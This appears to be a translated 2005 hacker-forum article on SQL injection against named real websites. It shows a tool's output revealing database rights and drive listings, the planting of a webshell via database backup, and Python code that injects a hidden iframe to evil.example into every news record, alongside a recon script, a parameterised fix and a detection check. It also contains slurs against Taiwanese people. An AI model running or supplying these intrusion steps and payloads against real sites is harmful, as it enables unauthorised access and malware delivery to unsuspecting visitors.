Web Trojan implantation techniques - vulnerability warning - the black bar safety net
myhack58 MYHACK58:6220055956
Dec 31, 2005 - 12:00 a.m.
Author: Anonymous (佚名)
www.myhack58.com

Recently far too many sites have been hung with Trojans. It's depressing: everywhere I go online there is a Trojan. The big webmasters should patch their holes promptly. Here I'll only give you the idea; I won't write out specific intrusion methods or anything like that.

Everyone knows that static HTML cannot be injected, so I looked at how this page was dynamic and had a look at the source code:

<td class="NewsContent2"><p><table width=100% border=0><tr><td><div align=center><font color=#000066 size=4><strong>Jin Orchestra charging imminent, new song explosive</strong></font></div><br><div align=center><span class=p2><font color=#666666>2005-04-16</font> 【<a href=http://news.17173.com/newsarticle/ target=_parent>news tips, with prizes</a>】 <font color=#FF0000>【<a href=http://news.17173.com/m_false.asp?newsid=74565&newstitle=Jin Orchestra charging imminent, new song explosive><font color=#FF0000>spot the error, with prizes</font></a>】</font> <font color=#FF0000>【<a href=http://news.17173.com/newsarticle/><font color=#FF0000>news submission</font></a>】</font> 【<a href=#><font color=#0000FF>recommend to a friend by phone</font></a>】</span></div><br><span id='tabNewsContent' class=NewsContent2><iframe src="http://www.17173.com/if/top-new1.html" name="contentFRM" id="contentFRM" scrolling="no" width="326" height="350" marginwidth="0" marginheight="0" frameborder="0" align="left"></iframe> The fashionable online music game Jin Orchestra's beta is hot, the music kingdom is prospering and players get the music-filled days they want; Jin Orchestra keeps adding new zones, and the number of players online rose rapidly, in early April 2005 breaking the 18 million mark in one stroke! At the same time the news that Jin Orchestra will run permanently free shocked the hearts of most players.<br>
In it we see this segment:
http://news.17173.com/m_false.asp?newsid=74565
That is an ASP page, so I ran it through NBSI2, and the result turned out... speechless. The webmaster has been notified.
Well, that was 17173. Let's look at Huajun Software Park.
Just open a news page:
http://news.onlinedown.net/info/12378-1.htm
Good.
We look at the source code:
<img border="0" src="../down_info.asp?id=12378" width="1" height="1">
See, it is an ASP address: a 1x1 counter image on an otherwise static .htm page.
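The two cases above (a link and an iframe inside a 17173 page, a hidden 1x1 counter image inside an onlinedown page) are the same reconnaissance step: the static .htm page cannot be injected itself, but the ASP scripts it pulls in can. The following Python script is an added example, not code from the article or from NBSI. It parses a page's HTML and lists every src/href that resolves to a dynamic script with query parameters, flagging 1x1 images, which are almost always hit counters that run an UPDATE with the parameter on every page view. The sample page and base URL are constructed to mirror the article's two snippets; the host names are the ones the article quotes and are used here only as strings.

```python
"""Find dynamic (.asp etc.) endpoints referenced from an otherwise static page.

Added example, not code from the article or from NBSI. The sample page below
is constructed to mirror the article's two snippets; the host names are the
ones the article quotes and are only used as strings here.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urljoin, urlparse

# Extensions that mark a server-side script taking parameters (assumed list).
DYNAMIC_EXTENSIONS = (".asp", ".aspx", ".php", ".jsp", ".cgi")

# Constructed sample: the page the article reads is /info/12378-1.htm on
# news.onlinedown.net; the 17173 link and iframe are pasted in from the
# article's first snippet so that both cases are covered by one input.
SAMPLE_BASE = "http://news.onlinedown.net/info/12378-1.htm"
SAMPLE_PAGE = """
<a href=http://news.17173.com/m_false.asp?newsid=74565&amp;newstitle=x>spot the error</a>
<iframe src="http://www.17173.com/if/top-new1.html" width="326" height="350"></iframe>
<img border="0" src="../down_info.asp?id=12378" width="1" height="1">
<a href="/info/12378-2.htm">next page</a>
"""


class EndpointFinder(HTMLParser):
    """Collects every src/href that resolves to a dynamic script."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.found = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        url = attrs.get("src") or attrs.get("href")
        if not url:
            return
        absolute = urljoin(self.base_url, url)   # "../down_info.asp" -> site root
        parts = urlparse(absolute)
        if not parts.path.lower().endswith(DYNAMIC_EXTENSIONS):
            return                                # .htm/.html is static, skip it
        params = [name for name, _ in parse_qsl(parts.query, keep_blank_values=True)]
        # A 1x1 image fetching a script is almost always a hit counter,
        # i.e. an UPDATE that runs on every page view with our parameter in it.
        hidden_counter = (tag == "img" and attrs.get("width") == "1"
                          and attrs.get("height") == "1")
        self.found.append({
            "tag": tag,
            "url": absolute,
            "params": params,
            "hidden_counter": hidden_counter,
        })


def find_dynamic_endpoints(html, base_url):
    """Return the dynamic endpoints referenced by `html`, in document order."""
    parser = EndpointFinder(base_url)
    parser.feed(html)
    parser.close()
    return parser.found


if __name__ == "__main__":
    for ep in find_dynamic_endpoints(SAMPLE_PAGE, SAMPLE_BASE):
        flag = " (hidden counter)" if ep["hidden_counter"] else ""
        print(f"<{ep['tag']}> {ep['url']} params={ep['params']}{flag}")
```

Each reported URL and parameter name is a candidate to hand to an injection tool; the hidden-counter flag matters because a counter script is the one endpoint on a news site that writes to the database on every view.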
We take NBSI2, run it against http://news.onlinedown.net/down_info.asp?id=12378 and see what happens.
NBSI2 output (information captured from the HTTP headers and IIS error prompts):

Injection method: character type
Database: SQL Server (error messages on)
SQL Server information: multiple-statement execution supported
Current user: onlinedownnewhua
User permissions: turned out to be db_owner
Current database: NewHua

Let's look across databases to see what else is on the server.
Database list:
master, tempdb, model, msdb, pubs, Northwind, newhua*
His database has been broken into.
But is there anything to use?
Thinking about it: once the path of the web root is known, he can be hung with a Trojan using the backup-to-webshell class of tools (these write a database backup containing the shell text into a file under the web root; db_owner is enough to run BACKUP, provided the SQL Server service account can write to that path).
Click the tool's NB TREE_list function and first look at what is on his C drive. Input path:
c:\

C:\Documents and Settings\
C:\Downloads\
C:\Program Files\
C:\RECYCLER\
C:\System Volume Information\
C:\WINNT\

the same. log
I won't go any further on Huajun here. So a big website like that turns out to have this many vulnerabilities; think about it.
With the Sino-Japanese hacker war in May to prepare for, I think the first one to be hacked might well be him.
Now let's go and look at the Taiwan Gamania (Game Orange) official site.
Little Taiwan? I won't give him any face.
Gamania has a pretty stupid vulnerability.
Taiwanese really are stupid. What is this so-called standalone cross-site vulnerability? Let's just go and look.
Everyone knows that a so-called cross-site (XSS) attack is a program not filtering user input adequately, so that when a visitor browses the site, the malicious script that was input is executed. What gets inserted may be a piece of text, may be JavaScript that steals the browser's cookies, or may even be web Trojan code exploiting an IE vulnerability. This attack is much simpler to carry out than getting a webshell and then inserting Trojan code, though it also has its drawbacks, which we'll discuss. First, the prerequisite for a cross-site attack is of course a place on the site where input is not strictly filtered. On some large non-interactive sites such input points are not easy to find, so starting from the surface is quite tricky.
Let's consider it from a different angle: if the site has SQL injection, the result is different. The database I'm talking about here is MSSQL; it also works for MySQL and other databases, but the process is more tedious. It is a very effective use of a SQL injection vulnerability that does not require admin (sa) privileges: UPDATE permission is enough, and a member of db_owner generally has it. We directly modify the information in the database, so that when the ASP program reads the database, the Trojan code we wrote into the modified records is displayed on the page. Below I'll use an example to show the attack process.
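The following Python example is added here and is not the article's code. It reproduces the attack just described against an in-memory SQLite database standing in for MSSQL: a hit-counter script like the hidden down_info.asp image concatenates its id parameter into an UPDATE, a stacked second statement rewrites every news body, and the site then serves the iframe to everyone who reads any article. Table and column names, the Trojan URL (evil.example) and the use of executescript() to imitate MSSQL's multi-statement execution are assumptions. The hardened version uses a parameterised query, and infected_ids() is the check a webmaster would run after an incident.

```python
"""Stored web-Trojan injection through a SQL-injectable hit counter.

Added example, not the article's code. An in-memory SQLite database stands
in for MSSQL; table/column names, the Trojan URL and the use of
executescript() to imitate MSSQL stacked statements are assumptions.
MSSQL concatenates strings with +, SQLite with ||.
"""
import sqlite3

# Assumed Trojan page; a 0x0 frame loads it invisibly for every reader.
TROJAN_IFRAME = '<iframe src="http://evil.example/x.html" width="0" height="0"></iframe>'


def make_db():
    """Constructed sample data: two news records, each with a hit counter."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id TEXT PRIMARY KEY, title TEXT, body TEXT, hits INTEGER);
        INSERT INTO news VALUES ('12378', 'WinRAR 3.50', 'Compression tool update.', 0);
        INSERT INTO news VALUES ('12379', 'Maxthon 1.3', 'Browser shell update.', 0);
    """)
    return conn


def count_hit_vulnerable(conn, news_id):
    """Mirrors the ASP pattern: the query-string value is pasted into the SQL text.

    executescript() runs every statement in the string, which is what MSSQL
    does with a stacked "'; UPDATE ...". Python's execute() would refuse the
    second statement, so it cannot imitate the MSSQL behaviour.
    """
    sql = f"UPDATE news SET hits = hits + 1 WHERE id = '{news_id}'"
    conn.executescript(sql)


def count_hit_hardened(conn, news_id):
    """Parameterised: the value can only ever be compared, never parsed as SQL."""
    conn.execute("UPDATE news SET hits = hits + 1 WHERE id = ?", (news_id,))
    conn.commit()


def injection_payload():
    """The id= value the attacker requests once: closes the string, stacks an
    UPDATE that appends the iframe to every body, and re-balances the trailing
    quote the script adds (a '--' comment would do the same on MSSQL)."""
    return f"12378'; UPDATE news SET body = body || '{TROJAN_IFRAME}' WHERE '1'='1"


def render(conn, news_id):
    """Stand-in for the news page that prints body straight into the HTML."""
    row = conn.execute("SELECT body FROM news WHERE id = ?", (news_id,)).fetchone()
    return row[0] if row else ""


def infected_ids(conn):
    """Defender-side check after an incident: which records carry a frame?"""
    rows = conn.execute("SELECT id FROM news WHERE body LIKE '%<iframe%' ORDER BY id")
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    count_hit_vulnerable(db, injection_payload())   # one request from the attacker
    print("infected:", infected_ids(db))            # every record, not just 12378
    print(render(db, "12379"))                      # readers of other articles get the frame
    clean = make_db()
    count_hit_hardened(clean, injection_payload())
    print("infected after hardening:", infected_ids(clean))
```

One request is enough because the stacked UPDATE has no WHERE restriction on the news id; the whole site is hung with the Trojan until the bodies are cleaned, and cleaning without fixing the concatenation only invites the next request. The hardened counter treats the payload as an id that matches nothing, so no row changes.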
While browsing the Taiwan Gamania site http://www.gamania.com I found this injectable spot:
http://fateasia.gamania.com/turtle/index.asp?sid=E00001 A secret thrill: even a big station like this can be injected. So, trusting to luck, I took out the housekeeping tool NBSI and went for a walk, guessing out the following information:
Oh, someone's database is confidential, ha.
The specific method I have already spoken of; I won't nag again. After getting the path, of course, it's backup-to-webshell.
Since I haven't seen how cyf's tool tells int-type from character-type data, I added a ' to the URL parameter myself, that is, tried it as integer-type injection. Below let's look at how the result turned out:

Failure. It seems a conventional attack won't produce any new breakthrough; we'll have to find another way.